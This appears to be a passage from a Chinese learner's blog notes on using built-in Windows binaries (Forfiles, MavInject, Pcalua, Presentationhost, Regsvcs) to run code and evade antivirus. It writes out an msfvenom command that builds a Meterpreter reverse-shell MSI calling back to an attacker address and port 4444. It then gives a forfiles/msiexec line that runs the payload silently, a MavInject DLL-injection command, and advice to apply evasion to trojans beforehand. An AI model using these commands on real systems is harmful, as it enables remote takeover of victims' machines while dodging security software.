C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe 1.dll

MavInject.exe

MavInject32.exe是微软应⽤程序虚拟化的⼀部分，可以直接完成向某⼀进程注⼊代码的功能

Forfiles.exe

Forfiles是⼀款windows平台默认安装的⽂件操作搜索⼯具之⼀，可以通过⽂件名称，修改⽇期等条件选择⽂件并运⾏⼀个命令来操作⽂件。它可以直接在命令⾏中使⽤，也可以在批处理⽂件或其他脚本中使⽤

生成msi payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.221.128 LPORT=4444 -f msi > test.txt

执行命令

forfiles /p c:\windows\system32 /m cmd.exe /c "msiexec.exe /q /i C:\test\test.txt"

360直接报毒

Pcalua.exe

Pcalua是Windows进程兼容性助理(Program Compatibility Assistant)的⼀个组件

pcalua.exe -a exe/bat/dll 

测试过程中未做处理的木马没等运行就被删了，建议提前做点免杀处理

presentationhost.exe

Presentationhost.exe是⼀个内置的Windows可执⾏⽂件，⽤于运⾏XAML浏览器应⽤程序（即.xbap⽂件）

Presentationhost.exe C:\temp\Evil.xbap

行为预警

SyncAppvPublishingServer.vbs

环境缺失

MavInject32.exe

MavInject32.exe是微软应⽤程序虚拟化的⼀部分，可以直接完成向某⼀进程注⼊代码的功能

使用方式

MavInject32.exe <PID> /INJECTRUNNING <PATH DLL>

Win7中没有发现该文件，自己的Win10中也没找到，还得看具体情况

总结

这段时间主要是看重剑无锋师傅的远控免杀系列文章结合从网上搜到的各种资料来学习，现在顶多算入门水平

自己测试复现下来部分方法的免杀效果和文章中还是有出入，还有很多方法因为奇奇怪怪的问题没有复现成功，也发了几次邮件给作者请教还未得到答复，未来对于远控免杀技术有了更深的理解后可能会重新整理一遍这几篇小破文或者重写一遍

参考

LOLBAS：https://lolbas-project.github.io/#